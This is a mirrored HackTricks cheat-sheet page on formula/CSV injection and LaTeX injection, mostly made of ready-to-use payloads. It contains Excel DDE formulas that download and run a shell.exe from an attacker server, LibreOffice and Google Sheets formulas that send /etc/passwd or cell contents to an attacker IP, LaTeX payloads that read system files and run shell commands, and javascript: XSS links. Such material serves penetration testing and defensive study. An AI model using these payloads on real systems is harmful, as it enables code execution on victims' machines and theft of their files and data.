mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
228 lines
11 KiB
Markdown
228 lines
11 KiB
Markdown
|
# Formula/CSV/Doc/LaTeX/GhostScript Injection
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## Formula Injection
|
||
|
|
||
|
### Info
|
||
|
|
||
|
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
|
||
|
{% endhint %}
|
||
|
|
||
|
### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
|
||
|
|
||
|
```
|
||
|
DDE ("cmd";"/C calc";"!A0")A0
|
||
|
@SUM(1+9)*cmd|' /C calc'!A0
|
||
|
=10+20+cmd|' /C calc'!A0
|
||
|
=cmd|' /C notepad'!'A1'
|
||
|
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
|
||
|
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
|
||
|
```
|
||
|
|
||
|
### Hyperlink
|
||
|
|
||
|
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
|
||
|
|
||
|
The following example was taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
|
||
|
|
||
|
Imagine a security breach in a Student Record Management system is exploited through a CSV injection attack. The attacker's primary intention is to compromise the system used by teachers to manage student details. The method involves the attacker injecting a malicious payload into the application, specifically by entering harmful formulas into fields meant for student details. The attack unfolds as follows:
|
||
|
|
||
|
1. **Injection of Malicious Payload:**
|
||
|
* The attacker submits a student detail form but includes a formula commonly used in spreadsheets (e.g., `=HYPERLINK("<malicious_link>","Click here")`).
|
||
|
* This formula is designed to create a hyperlink, but it points to a malicious server controlled by the attacker.
|
||
|
2. **Exporting Compromised Data:**
|
||
|
* Teachers, unaware of the compromise, use the application's functionality to export the data into a CSV file.
|
||
|
* The CSV file, when opened, still contains the malicious payload. This payload appears as a clickable hyperlink in the spreadsheet.
|
||
|
3. **Triggering the Attack:**
|
||
|
* A teacher clicks on the hyperlink, believing it to be a legitimate part of the student's details.
|
||
|
* Upon clicking, sensitive data (potentially including details from the spreadsheet or the teacher's computer) is transmitted to the attacker's server.
|
||
|
4. **Logging the Data:**
|
||
|
* The attacker's server receives and logs the sensitive data sent from the teacher's computer.
|
||
|
* The attacker can then use this data for various malicious purposes, further compromising the privacy and security of the students and the institution.
|
||
|
|
||
|
### RCE
|
||
|
|
||
|
**Check the** [**original post**](https://notsosecure.com/data-exfiltration-formula-injection-part1) **for further details.**
|
||
|
|
||
|
In specific configurations or older versions of Excel, a feature called Dynamic Data Exchange (DDE) can be exploited for executing arbitrary commands. To leverage this, the following settings must be enabled:
|
||
|
|
||
|
* Navigate to File → Options → Trust Center → Trust Center Settings → External Content, and enable **Dynamic Data Exchange Server Launch**.
|
||
|
|
||
|
When a spreadsheet with the malicious payload is opened (and if the user accepts the warnings), the payload is executed. For example, to launch the calculator application, the payload would be:
|
||
|
|
||
|
```markdown
|
||
|
=cmd|' /C calc'!xxx
|
||
|
```
|
||
|
|
||
|
Additional commands can also be executed, such as downloading and executing a file using PowerShell:
|
||
|
|
||
|
```bash
|
||
|
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
|
||
|
```
|
||
|
|
||
|
### Local File Inclusion (LFI) in LibreOffice Calc
|
||
|
|
||
|
LibreOffice Calc can be used to read local files and exfiltrate data. Here are some methods:
|
||
|
|
||
|
* Reading the first line from the local `/etc/passwd` file: `='file:///etc/passwd'#$passwd.A1`
|
||
|
* Exfiltrating the read data to an attacker-controlled server: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
|
||
|
* Exfiltrating more than one line: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
|
||
|
* DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`
|
||
|
|
||
|
### Google Sheets for Out-of-Band (OOB) Data Exfiltration
|
||
|
|
||
|
Google Sheets offers functions that can be exploited for OOB data exfiltration:
|
||
|
|
||
|
* **CONCATENATE**: Appends strings together - `=CONCATENATE(A2:E2)`
|
||
|
* **IMPORTXML**: Imports data from structured data types - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
|
||
|
* **IMPORTFEED**: Imports RSS or ATOM feeds - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
|
||
|
* **IMPORTHTML**: Imports data from HTML tables or lists - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
|
||
|
* **IMPORTRANGE**: Imports a range of cells from another spreadsheet - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
|
||
|
* **IMAGE**: Inserts an image into a cell - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`
|
||
|
|
||
|
## LaTeX Injection
|
||
|
|
||
|
Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
|
||
|
This program uses 3 main attributes to (dis)allow command execution:
|
||
|
|
||
|
* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
|
||
|
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** \*\*commands (\*\*On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
|
||
|
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
|
||
|
|
||
|
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
|
||
|
|
||
|
### Read file <a href="#read-file" id="read-file"></a>
|
||
|
|
||
|
You might need to adjust injection with wrappers as \[ or $.
|
||
|
|
||
|
```bash
|
||
|
\input{/etc/passwd}
|
||
|
\include{password} # load .tex file
|
||
|
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
|
||
|
\usepackage{verbatim}
|
||
|
\verbatiminput{/etc/passwd}
|
||
|
```
|
||
|
|
||
|
#### Read single lined file
|
||
|
|
||
|
```bash
|
||
|
\newread\file
|
||
|
\openin\file=/etc/issue
|
||
|
\read\file to\line
|
||
|
\text{\line}
|
||
|
\closein\file
|
||
|
```
|
||
|
|
||
|
#### Read multiple lined file
|
||
|
|
||
|
```bash
|
||
|
\newread\file
|
||
|
\openin\file=/etc/passwd
|
||
|
\loop\unless\ifeof\file
|
||
|
\read\file to\fileline
|
||
|
\text{\fileline}
|
||
|
\repeat
|
||
|
\closein\file
|
||
|
```
|
||
|
|
||
|
### Write file <a href="#write-file" id="write-file"></a>
|
||
|
|
||
|
```bash
|
||
|
\newwrite\outfile
|
||
|
\openout\outfile=cmd.tex
|
||
|
\write\outfile{Hello-world}
|
||
|
\closeout\outfile
|
||
|
```
|
||
|
|
||
|
### Command execution <a href="#command-execution" id="command-execution"></a>
|
||
|
|
||
|
The input of the command will be redirected to stdin, use a temp file to get it.
|
||
|
|
||
|
```bash
|
||
|
\immediate\write18{env > output}
|
||
|
\input{output}
|
||
|
|
||
|
\input{|"/bin/hostname"}
|
||
|
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
|
||
|
|
||
|
# allowed mpost command RCE
|
||
|
\documentclass{article}\begin{document}
|
||
|
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
|
||
|
\end{document}
|
||
|
|
||
|
# If mpost is not allowed there are other commands you might be able to execute
|
||
|
## Just get the version
|
||
|
\input{|"bibtex8 --version > /tmp/b.tex"}
|
||
|
## Search the file pdfetex.ini
|
||
|
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
|
||
|
## Get env var value
|
||
|
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
|
||
|
## Get the value of shell_escape_commands without needing to read pdfetex.ini
|
||
|
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
|
||
|
```
|
||
|
|
||
|
If you get any LaTex error, consider using base64 to get the result without bad characters
|
||
|
|
||
|
```bash
|
||
|
\immediate\write18{env | base64 > test.tex}
|
||
|
\input{text.tex}
|
||
|
```
|
||
|
|
||
|
```bash
|
||
|
\input|ls|base4
|
||
|
\input{|"/bin/hostname"}
|
||
|
```
|
||
|
|
||
|
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
|
||
|
|
||
|
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
|
||
|
|
||
|
```bash
|
||
|
\url{javascript:alert(1)}
|
||
|
\href{javascript:alert(1)}{placeholder}
|
||
|
```
|
||
|
|
||
|
## Ghostscript Injection
|
||
|
|
||
|
**Check** [**https://blog.redteam-pentesting.de/2023/ghostscript-overview/**](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
|
||
|
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
|
||
|
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
|
||
|
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|
||
|
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|